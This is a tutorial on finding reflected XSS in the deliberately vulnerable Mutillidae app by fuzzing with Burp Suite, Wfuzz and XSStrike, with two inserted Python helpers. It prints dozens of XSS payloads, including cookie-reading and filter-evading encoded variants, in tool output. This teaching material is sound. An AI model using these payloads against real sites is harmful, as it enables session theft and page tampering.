
Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike

By drd_

11/28/2018 12:34 am

Cross-site scripting is one of the most common vulnerabilities found on the web today, with
repercussions of this type of flaw ranging from harmless defacement to sensitive data exposure.
Probing for XSS can be tedious and time-consuming for an attacker, but luckily there are tools
available to make things a little easier, including Burp Suite, Wfuzz, and XSStrike.

Fuzzing Overview

Fuzzing is a technique used to test applications for security flaws in an automated fashion. The
fuzzer, a piece of software designed to test for these flaws, feeds malformed or random data as
input to a program in order to find bugs, which in a security context usually means vulnerabilities.
Generated input can be static, such as values loaded from a list, or random, and newer fuzzers are
even starting to generate their input dynamically with algorithms.


We will be using Mutillidae, a vulnerable web application, to test for XSS flaws. To get started, open
up Mutillidae, and on the left, browse to "OWASP Top 10," then "Cross Site Scripting," followed by
"Reflected," and finally "DNS Lookup." This will be our entry point for XSS fuzzing.

App 1: Burp Suite

Burp Suite is a powerful tool used to test web applications for vulnerabilities. The free Community
Edition is included in Kali Linux. In its most common utilization, Burp is used as a proxy to intercept
and modify requests.

We need to configure our browser to work with Burp. In Firefox, go to "Preferences," and scroll all
the way down to the section titled Network Proxy. Click on the "Settings" button, select "Manual
proxy configuration," and enter as the HTTP Proxy and 8080 as the Port. Now, check "Use
this proxy server for all protocols," and make sure it is blank under No Proxy for.
Finally, click "OK," and everything should be configured correctly. You can then fire up Burp Suite and
start a new project. Navigate to the "Proxy" tab and ensure the "Intercept is on" button is pressed.
This will allow us to modify the request and fuzz for XSS.

Next, back in Mutillidae, enter a value in the Hostname/IP text box, and hit "Lookup DNS" to submit
the request (I just used – it doesn't really matter here). The request should show up in Burp.
Right-click anywhere in the request window, select "Send to Intruder," then navigate to the
"Intruder" tab. We will use the "Sniper" attack type to iterate through a list of payloads. Burp will
automatically select positions to use, which are the parameters to test, but for now, we only need
one. Hit the "Clear" button on the right, highlight the target host we entered earlier, and hit the
"Add" button.

Next, go to the "Payloads" tab, and under Payload Options, press "Load." There is a useful wordlist
located at /usr/share/wfuzz/wordlist/Injections/XSS.txt — browse to it and we are ready to launch
the attack.

Press "Start attack," and a new window will pop up. Once the attack has iterated through all the
payloads in our wordlist, the attack is finished and we can see all the requests and their status codes.
To demonstrate, let's take a look at request number 3. If we paste this payload into the DNS Lookup
utility, an alert box will pop up proving that this page is indeed vulnerable to XSS.

Before we move on to other tools, make sure your browser's proxy configuration is changed back to
use system settings.

App 2: Wfuzz

Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL
injections, hidden directories, form parameters, and more. It is included in Kali by default.

To display help settings, type wfuzz -h at the terminal.

wfuzz -h

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.


* Wfuzz 2.2.11 - The Web Fuzzer *

* *

* Version up to 1.4c coded by: *

* Christian Martorella ([email protected]) *

* Carlos del ojo ([email protected]) *

* *

* Version 1.4d to 2.2.11 coded by: *

* Xavier Mendez ([email protected]) *


Usage: wfuzz [options] -z payload,params <url>

FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of
the specified payload.

FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request

performed and could be used as a base for filtering.


-h : This help

--help : Advanced help

--version : Wfuzz version details

-e <type> : List of available encoders/payloads/iterators/printers/scripts

-c : Output with colors

-v : Verbose information.

--interact : (beta) If selected,all key presses are captured. This allows you to
interact with the program.

-p addr : Use Proxy in format ip:port:type. Repeat option for using various

Where type could be SOCKS4,SOCKS5 or HTTP if omitted.


We will be testing the same page in Mutillidae for XSS vulnerabilities. Basic usage of Wfuzz includes
specifying a wordlist file including the payloads to use with the -z flag, and the URL to test, replacing
the parameter in question with FUZZ. We can also set the -c flag to get color output.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.


* Wfuzz 2.2.11 - The Web Fuzzer *



Total requests: 39


ID Response Lines Word Chars Payload


000020: C=200 514 L 1425 W 21898 Ch "<IMG%20SRC=`javascript:alert("'WXSS'")`>"

000019: C=200 514 L 1425 W 21812 Ch "<IMG

000021: C=200 514 L 1425 W 21983 Ch "<IMG

000001: C=200 514 L 1420 W 21769 Ch ""><script>""

000003: C=200 514 L 1420 W 21907 Ch "<<script>alert("WXSS");//<</script>"

000016: C=200 514 L 1425 W 21877 Ch "<IMG%20SRC="javascript:alert('WXSS')""

000015: C=200 514 L 1425 W 21893 Ch "<IMG%20SRC="javascript:alert('WXSS');">"

000002: C=200 514 L 1420 W 21870 Ch "<script>alert("WXSS")</script>"

000018: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>"

000017: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=javascript:alert('WXSS')>"

000022: C=200 514 L 1425 W 21973 Ch "<IMG


000023: C=200 514 L 1425 W 21762 Ch "<IMG%20SRC='javasc


000024: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav


000025: C=200 514 L 1425 W 21757 Ch "<IMG


000027: C=200 514 L 1425 W 21757 Ch "<IMG


000030: C=200 514 L 1425 W 21903 Ch "<IMG


000029: C=200 514 L 1425 W 21903 Ch "<IMG


000026: C=200 514 L 1425 W 21757 Ch "<IMG


000028: C=200 514 L 1430 W 21747 Ch "<IMG


000031: C=200 514 L 1425 W 22060 Ch "<IMG%20SRC='%26%23x6a;avasc


000032: C=200 514 L 1425 W 21727 Ch "<IMG


000033: C=200 514 L 1425 W 21727 Ch "<IMG

000034: C=200 514 L 1425 W 21727 Ch "<IMG

000036: C=200 514 L 1425 W 22191 Ch


000037: C=200 514 L 1425 W 22196 Ch "%22%3E%3Cscript%3Edocument

000035: C=200 514 L 1425 W 21950 Ch "'%3CIFRAME


000039: C=200 514 L 1420 W 21763 Ch "'';!--"<XSS>=&{()}"

000038: C=200 514 L 1420 W 22883 Ch


000005: C=200 514 L 1420 W 21911 Ch "'><script>alert(document.cookie)</script>"

000004: C=200 514 L 1420 W 21895 Ch "<script>alert(document.cookie)</script>"

000006: C=200 514 L 1420 W 21916 Ch "'><script>alert(document.cookie);</script>"

000007: C=200 514 L 1420 W 21776 Ch "\";alert('XSS');//"

000008: C=200 514 L 1420 W 21875 Ch "%3cscript%3ealert("WXSS");%3c/script


000009: C=200 514 L 1420 W 21900 Ch "%3cscript%3ealert(document.cookie);%3c


000010: C=200 514 L 1425 W 21875 Ch "%3Cscript%3Ealert(%22X%20SS%22);


000011: C=200 563 L 1570 W 24175 Ch


000012: C=200 563 L 1570 W 24175 Ch


000013: C=200 514 L 1420 W 21964 Ch


000014: C=200 514 L 1425 W 21913 Ch "<IMG


Total time: 26.54032

Processed Requests: 39

Filtered Requests: 0
Requests/sec.: 1.469462

We can see each request ID, the response code, and the line, word, and character counts of each
response. The payloads from our wordlist file are also included, and near the bottom, there is
summary data including the total time and the number of requests. Also of use, when fuzzing an
application where many different response codes might be encountered, the --hc flag can be used
to hide certain responses, such as 404s.
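An added example, not the article's or Wfuzz's own code: it parses result rows like the ones above and applies the same idea as --hc to pick out the responses whose shape differs from the rest, which is how the few rows worth confirming by hand stand out. The sample rows are copied from the run above.

```python
# Added example, not the article's or Wfuzz's own code: parses the result rows Wfuzz
# prints and surfaces the responses whose shape differs from the baseline, so the
# few rows worth confirming by hand stand out from the other 39.
import re
from collections import Counter

# Constructed sample: rows copied from the Wfuzz run shown above (some payloads were
# cut off in the original output, which the parser has to tolerate).
SAMPLE_OUTPUT = """\
000020: C=200 514 L 1425 W 21898 Ch "<IMG%20SRC=`javascript:alert("'WXSS'")`>"
000001: C=200 514 L 1420 W 21769 Ch ""><script>""
000002: C=200 514 L 1420 W 21870 Ch "<script>alert("WXSS")</script>"
000011: C=200 563 L 1570 W 24175 Ch
000012: C=200 563 L 1570 W 24175 Ch
000013: C=200 514 L 1420 W 21964 Ch
000005: C=200 514 L 1420 W 21911 Ch "'><script>alert(document.cookie)</script>"
"""

# ID, status code, line/word/char counts, then the payload in double quotes (optional).
ROW = re.compile(r'^(\d{6}):\s+C=(\d+)\s+(\d+) L\s+(\d+) W\s+(\d+) Ch(?:\s+"(.*)")?\s*$')


def parse_rows(output: str) -> list:
    """Turn each result line into a dict; banner, warning and summary lines are skipped."""
    rows = []
    for line in output.splitlines():
        m = ROW.match(line)
        if m:
            rows.append({"id": int(m[1]), "code": int(m[2]), "lines": int(m[3]),
                         "words": int(m[4]), "chars": int(m[5]), "payload": m[6]})
    return rows


def baseline_shape(rows: list) -> tuple:
    """The most common (status, line count) pair plays the role of FUZZ{baseline_value}."""
    return Counter((r["code"], r["lines"]) for r in rows).most_common(1)[0][0]


def interesting(rows: list, hide_codes=()) -> list:
    """Drop hidden status codes (what --hc does), then keep rows that differ from baseline.

    Line count is used rather than word/char count because, as the run above shows,
    those vary by a few units even between payloads that behave identically."""
    base = baseline_shape(rows)
    return [r for r in rows
            if r["code"] not in hide_codes and (r["code"], r["lines"]) != base]


if __name__ == "__main__":
    for r in interesting(parse_rows(SAMPLE_OUTPUT), hide_codes=(404,)):
        print(f"{r['id']:06d} C={r['code']} {r['lines']} L  payload={r['payload']!r}")
```

Requests 11 and 12 are the ones this surfaces from the sample: their responses are 49 lines longer than every other one, which is exactly the kind of difference you then confirm in a browser.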

Another helpful feature of Wfuzz is the ability to encode payloads in order to bypass defensive filters
more effectively. To list the available encoders, use the following command.

wfuzz -e encoders

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.

Available encoders:

Category | Name | Summary


url_safe, url | urlencode | Replace special characters in string using the %xx escape. Letters,
digits, and

| | the characters '_.-' are never quoted.

url_safe, url | double urlencode | Applies a double encode to special characters in string using the
%25xx escape.

| | Letters, digits, and the characters '_.-' are never quoted.

url | uri_double_hex | Encodes ALL charachers using the %25xx escape.

html | html_escape | Convert the characters '&', '<' and '>' in string to HTML-safe

html | html_hexadecimal | Replaces ALL characters in string using the &#xx; escape

hashes | base64 | Encodes the given string using base64

url | doble_nibble_hex | Replaces ALL characters in string using the %%dd%dd escape

db | mssql_char | Converts ALL characters to MsSQL's char(xx)

url | utf8 | Replaces ALL characters in string using the \u00xx escape

hashes | md5 | Applies a md5 hash to the given string

default | random_upper | Replaces random characters in string with its capitals letters

url | first_nibble_hex | Replaces ALL characters in string using the %%dd? escape
default | hexlify | Every byte of data is converted into the corresponding 2-digit hex

| | n.

url | second_nibble_hex | Replaces ALL characters in string using the %?%dd escape

url | uri_hex | Encodes ALL charachers using the %xx escape.

default | none | Returns string without changes

hashes | sha1 | Applies a sha1 hash to the given string

url | utf8_binary | Replaces ALL characters in string using the \uxx escape

url | uri_triple_hex | Encodes ALL charachers using the %25%xx%xx escape.

url | uri_unicode | Replaces ALL characters in string using the %u00xx escape

html | html_decimal | Replaces ALL characters in string using the &#dd; escape

db | oracle_char | Converts ALL characters to Oracle's chr(xx)

db | mysql_char | Converts ALL characters to MySQL's char(xx)

Simply append the desired encoder (in this case urlencode) to the specified file, separated by a
comma, to encode the payloads.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.


* Wfuzz 2.2.11 - The Web Fuzzer *



Total requests: 39


ID Response Lines Word Chars Payload

000003: C=200 514 L 1420 W 21907 Ch "%3C%3Cscript%3Ealert%28%22WXSS

000002: C=200 514 L 1420 W 21870 Ch "%3Cscript%3Ealert%28%22WXSS


000001: C=200 514 L 1420 W 21769 Ch "%22%3E%3Cscript%3E%22"

000007: C=200 514 L 1420 W 21776 Ch "%5C%22%3Balert%28%27XSS


000005: C=200 514 L 1420 W 21911 Ch "%27%3E%3Cscript%3Ealert


000009: C=200 514 L 1420 W 21926 Ch "%253cscript%253ealert


000008: C=200 514 L 1420 W 21891 Ch "%253cscript%253ealert%28%22WXSS


000004: C=200 514 L 1420 W 21895 Ch "%3Cscript%3Ealert%28document.cookie


000010: C=200 514 L 1420 W 21901 Ch "%253Cscript%253Ealert%28%2522X


000006: C=200 514 L 1420 W 21916 Ch "%27%3E%3Cscript%3Ealert


000011: C=200 514 L 1420 W 21924 Ch "%26ltscript%26gtalert%28document.cookie


000015: C=200 514 L 1420 W 21903 Ch "%3CIMG%2520SRC%3D%22javascript


000012: C=200 514 L 1420 W 21968 Ch "%26ltscript%26gtalert%28document.cookie


000014: C=200 514 L 1420 W 21923 Ch "%3CIMG%2520SRC%3D%27javascript


000019: C=200 514 L 1420 W 21934 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert


000013: C=200 514 L 1420 W 21964 Ch "%3Cxss%3E%3Cscript%3Ealert


000016: C=200 514 L 1420 W 21887 Ch "%3CIMG%2520SRC%3D%22javascript


000017: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert


000018: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3DJaVaScRiPt%3Aalert

000020: C=200 514 L 1420 W 21908 Ch "%3CIMG%2520SRC%3D%60javascript

000022: C=200 514 L 1420 W 21983 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert


000021: C=200 514 L 1420 W 21993 Ch "%3CIMG%2520%22%22%22%3E%3CSCRIPT


000023: C=200 514 L 1425 W 21928 Ch "%3CIMG%2520SRC%3D%27javasc%09ript


000025: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav


000024: C=200 514 L 1425 W 21908 Ch "%3CIMG%2520SRC%3D%22jav%09ascript


000028: C=200 514 L 1420 W 21966 Ch "%3CIMG%2520SRC%3D


000027: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0D


000030: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520LOWSRC%3D%22javascript


000026: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0A


000029: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520DYNSRC%3D%22javascript


000031: C=200 514 L 1420 W 22118 Ch "%3CIMG%2520SRC%3D


000032: C=200 514 L 1420 W 22562 Ch "%3CIMG%2520SRC%3D%26%23106%3B


000033: C=200 514 L 1420 W 22967 Ch "%3CIMG%2520SRC%3D


000035: C=200 514 L 1420 W 21996 Ch "%27%253CIFRAME%2520SRC%3Djavascript


000034: C=200 514 L 1420 W 22507 Ch "%3CIMG%2520SRC%3D%26%23x6A


000036: C=200 514 L 1420 W 22191 Ch "%22%3E%3Cscript%3Edocument.location


000037: C=200 514 L 1420 W 22396 Ch "%2522%253E%253Cscript%253Edocument


000038: C=200 514 L 1420 W 22906 Ch "%27%3Balert%28String.fromCharCode


000039: C=200 514 L 1420 W 21796 Ch "%27%27%3B%21--%22%3CXSS%3E%3D


Total time: 27.33954

Processed Requests: 39

Filtered Requests: 0

Requests/sec.: 1.426505

The results are similar to before, but now each payload is URL encoded.
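As an added illustration, not code from the article or from Wfuzz itself, the following Python re-implements four of the encoders listed above from their one-line summaries and shows why a filter that inspects the raw parameter value is beaten by every one of them, while a filter that canonicalizes the value first is not. The hex-entity form used for html_hexadecimal (&#xHH;) is an assumption.

```python
# Added example, not the article's or Wfuzz's own code: re-implements four of the
# encoders from the table above and shows why a filter must canonicalize before
# matching. Encoder behaviour follows the one-line summaries Wfuzz prints;
# the hex-entity form "&#xHH;" for html_hexadecimal is an assumption.
import html
import re
import urllib.parse

# Letters, digits and '_.-' are "never quoted" according to the urlencode summary.
NEVER_QUOTED = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.-")


def urlencode(payload: str) -> str:
    """Wfuzz 'urlencode': %XX for every other byte, so '"><script>"' -> '%22%3E%3Cscript%3E%22'."""
    out = []
    for ch in payload:
        if ch in NEVER_QUOTED:
            out.append(ch)
        else:
            out.append("".join(f"%{b:02X}" for b in ch.encode("utf-8")))
    return "".join(out)


def double_urlencode(payload: str) -> str:
    """Wfuzz 'double urlencode': the '%' of each escape is encoded again, giving %25XX."""
    return urlencode(urlencode(payload))


def html_decimal(payload: str) -> str:
    """Wfuzz 'html_decimal': ALL characters become decimal entities &#dd;."""
    return "".join(f"&#{ord(ch)};" for ch in payload)


def html_hexadecimal(payload: str) -> str:
    """Wfuzz 'html_hexadecimal': ALL characters become hex entities (assumed &#xHH; form)."""
    return "".join(f"&#x{ord(ch):02x};" for ch in payload)


SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def naive_filter_blocks(value: str) -> bool:
    """Matches on the raw parameter value, so any of the encoders above slips past it."""
    return SCRIPT_TAG.search(value) is not None


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Undo URL escapes and HTML entities repeatedly until the value stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(urllib.parse.unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def canonical_filter_blocks(value: str) -> bool:
    """Same pattern, applied to the canonical form: catches the encoded variants too."""
    return SCRIPT_TAG.search(canonicalize(value)) is not None


if __name__ == "__main__":
    for enc in (urlencode, double_urlencode, html_decimal, html_hexadecimal):
        value = enc('"><script>"')  # request 000001 from the wordlist above
        print(f"{enc.__name__:17} naive={naive_filter_blocks(value)!s:5} "
              f"canonical={canonical_filter_blocks(value)}  {value}")
```

The urlencode output for request 000001 matches the %22%3E%3Cscript%3E%22 row in the run above, and encoding an already-encoded payload turns each % into %25, which is the %2522%253E... form seen for request 000037.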

App 3: XSStrike

The last tool we will look at today is XSStrike. It is a dedicated suite for detecting cross-site scripting
vulnerabilities that includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and
more. XSStrike is currently in beta.

Before we can use this tool, we need to download it from GitHub and install it on our machine. The
process may vary slightly depending on the system, but for reference, I am using the latest version of
Kali. XSStrike works best with Python 3.

Download the tool using the wget utility in the terminal, as seen in the below command.


Next, extract the archive by typing unzip, then change into the extracted directory with
cd XSStrike-master. Now we should be able to run the tool by typing python3 at the

It may throw an error stating that the fuzzywuzzy module is not installed.


Traceback (most recent call last):

File "", line 35, in <module>

from core.checker import checker

File "/root/XSStrike-master/core/", line 3, in <module>

from fuzzywuzzy import fuzz

ModuleNotFoundError: No module named 'fuzzywuzzy'

If this is the case, just use pip3 install fuzzywuzzy to install the missing module. Now we should be
good to go.

To display the help menu, use the -h flag.

python3 -h

XSStrike v3.0-beta

usage: [-h] [-u TARGET] [--data DATA] [--fuzzer] [--update]

[--timeout] [--params] [--crawl] [-l LEVEL] [--headers]

[-t THREADS] [-d DELAY] [--skip-poc] [--skip-dom]

optional arguments:

-h, --help show this help message and exit



--data DATA post data

--fuzzer fuzzer

--update update

--timeout timeout

--params find params

--crawl crawl

-l LEVEL, --level LEVEL

level of crawling

--headers add headers

-t THREADS, --threads THREADS

number of threads
-d DELAY, --delay DELAY

delay between requests

--skip-poc skip poc generation

--skip-dom skip dom checking

XSStrike's basic usage is quite simple — use the -u flag followed by the URL to test.

python3 -u

XSStrike v3.0-beta

[~] Checking for DOM vulnerabilities


52 //document.getElementById("idSystemInformationHeading").innerHTML =

53 document.getElementById("idHintsStatusHeading").innerHTML = 'Hints: ' +


54 document.getElementById("idSecurityLevelHeading").innerHTML = 'Security
Level: ' + l_securityLevel + ' (' + l_securityLevelDescription + ')';

446 Google Hacking Database

495 <a onclick="document.location.href='';"

584 window.localStorage.setItem("LocalStorageTarget","This is set by the

index.php page");

585 window.sessionStorage.setItem("SessionStorageTarget","This is set

by the index.php page");


[+] Potentially vulnerable objects found

[+] WAF Status: Offline

[!] Testing parameter: page

[!] Reflections found: 4

[~] Analysing reflections

[~] Generating payloads

[!] Payloads generated: 9256


[+] Payload: "><A%0aoNMOUseoveR%0d=%0d(confirm)() x>z

[!] Efficiency: 100

[!] Cofidence: 10

[?] Would you like to continue scanning? [y/N]

This tool begins by checking for DOM-based XSS vulnerabilities, and the potentially vulnerable
parameters are displayed on the screen. Reflected XSS is tested for next, and the interactive payload
generator displays the payload and the projected likelihood of success. To continue scanning, hit y at
the prompt.


[+] Payload: "><d3v%0aONPoINtERENtER+=+(confirm)()>z

[!] Efficiency: 100

[!] Cofidence: 10

[?] Would you like to continue scanning? [y/N]

We can also skip the DOM-based checking with the --skip-dom option.

python3 -u --skip-dom

XSStrike v3.0-beta

[+] WAF Status: Offline

[!] Testing parameter: page

[!] Reflections found: 4

[~] Analysing reflections

[~] Generating payloads

[!] Payloads generated: 9256


[+] Payload: "><HtmL%09oNPoINterENtEr%0d=%0dconfirm() x//

[!] Efficiency: 100

[!] Cofidence: 10

[?] Would you like to continue scanning? [y/N]

XSStrike also contains fuzzing capabilities used to test filters and WAFs. This can be extremely slow,
though, because it probes the application with randomly delayed requests. To speed things up, we can
set the delay to one second with the -d flag alongside the --fuzzer option.

python3 -u --skip-dom

--fuzzer -d 1
XSStrike v3.0-beta

[+] WAF Status: Offline

[!] Fuzzing parameter: page

[passed] <test

[passed] <test//

[passed] <test>

[passed] <test x>

[passed] <test x=y

[passed] <test x=y//

[passed] <test/oNxX=yYy//

[passed] <test oNxX=yYy>

[passed] <test onload=x

[passed] <test/o%00nload=x

[passed] <test sRc=xxx

[passed] <test data=asa

[passed] <test data=javascript:asa

[passed] <svg x=y>

[passed] <details x=y//

[passed] <a href=x//

[passed] <emBed x=y>

[passed] <object x=y//

[passed] <bGsOund sRc=x>

[passed] <iSinDEx x=y//

[passed] <aUdio x=y>

[passed] <script x=y>

[passed] <script//src=//

There are many other features included in this tool, and there are sure to be even more as XSStrike
undergoes further development.

Wrap Up

Fuzzing is an extremely useful technique for discovering vulnerabilities in a timely and thorough
manner. Today, we explored three fuzzing tools in an effort to find XSS flaws in a vulnerable web
application: Burp Suite, Wfuzz, and XSStrike. Knowing how to use tools like these will improve your
effectiveness as a white hat hacker and lead you on the path to success.
